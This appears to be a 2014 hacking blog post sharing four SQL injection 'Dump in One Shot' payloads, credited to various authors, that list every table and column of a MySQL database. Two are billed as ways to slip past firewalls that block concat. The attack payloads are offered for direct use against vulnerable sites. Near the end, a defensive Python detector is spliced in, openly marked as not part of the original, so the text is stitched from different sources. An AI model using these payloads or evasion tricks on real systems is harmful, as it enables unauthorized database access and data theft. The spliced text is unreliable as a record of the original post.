Starting in the name of my God "Allah", the most beneficent, the most merciful.

This time I won't take much of your time, as this is not a tutorial on DIOS. If you want one, you can visit:

http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-2.html
In this post we will only get to know DIOS a little better and introduce some different and new flavors of it.

USAGE FOR ALL DIOS: Just put the code in place of the vulnerable column and see the magic.

As most of you have seen, this one is the first DIOS:
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
Above is an awesome piece of code made by Profexer, a Russian hacker.

Below we can see another DIOS, by Dr.Z3r0:
(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
The next DIOS is one you can use when a WAF is really fucking you by blocking concat; here's the solution, made by my friend [email protected]:
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
Now the next DIOS, by me. Again the same thing: it saves your ass from the WAF by avoiding concat; secondly, it allows you to add up to 9 columns without any modification, and it is probably the shortest DIOS.
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
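Seen from the defending side, the four payloads above share two traits that do not depend on concat: a user-variable assignment (@:=) and a reference to information_schema. The Python sketch below is an added example, not code from the original post; it compares a concat-only rule with a rule keyed on those two traits, and its function names and the two benign sample inputs are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

ASSIGN = re.compile(r"@[a-z0-9_$.]*\s*:=")       # @:= or @name := (user-variable assignment)
SCHEMA = re.compile(r"\binformation_schema\b")
COMMENT_MARKS = re.compile(r"/\*!?\d*|\*/")      # drop only the markers: /*!50000 ... */ bodies execute

def normalize(value):
    """Decode up to two layers of URL encoding, unwrap comments, lowercase."""
    for _ in range(2):
        value = unquote_plus(value)
    return COMMENT_MARKS.sub(" ", value).lower()

def concat_only_rule(value):
    """The kind of rule the post describes: flag any input containing 'concat'."""
    return "concat" in normalize(value)

def dios_rule(value):
    """Return 'block', 'review' or 'allow' without relying on function names."""
    text = normalize(value)
    assign, schema = bool(ASSIGN.search(text)), bool(SCHEMA.search(text))
    if assign and schema:
        return "block"
    return "review" if assign or schema else "allow"

# Constructed parameter values: the four payloads from this page, then two benign inputs.
SAMPLES = [
    "(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)",
    "(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))",
    "(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))",
    "make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)",
    "how to concat two columns in mysql",
    "user@example.com",
]

def evaluate(samples=SAMPLES):
    """Pair each sample's concat-only verdict with its dios_rule verdict."""
    return [(concat_only_rule(s), dios_rule(s)) for s in samples]

if __name__ == "__main__":
    for (weak, strong), sample in zip(evaluate(), SAMPLES):
        print(f"concat-only={weak!s:5} dios={strong:6} {sample[:40]}")
```

The concat-only rule misses the export_set and make_set payloads and flags the harmless search phrase, while the structural rule blocks all four payloads and allows both benign inputs. Use it as a signal for WAF tuning or log review; it does not replace parameterized queries at the injection point.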


Thanks for reading.
Happy Hacking

Author : Zenodermus Javanicus
Date : 2014-07-21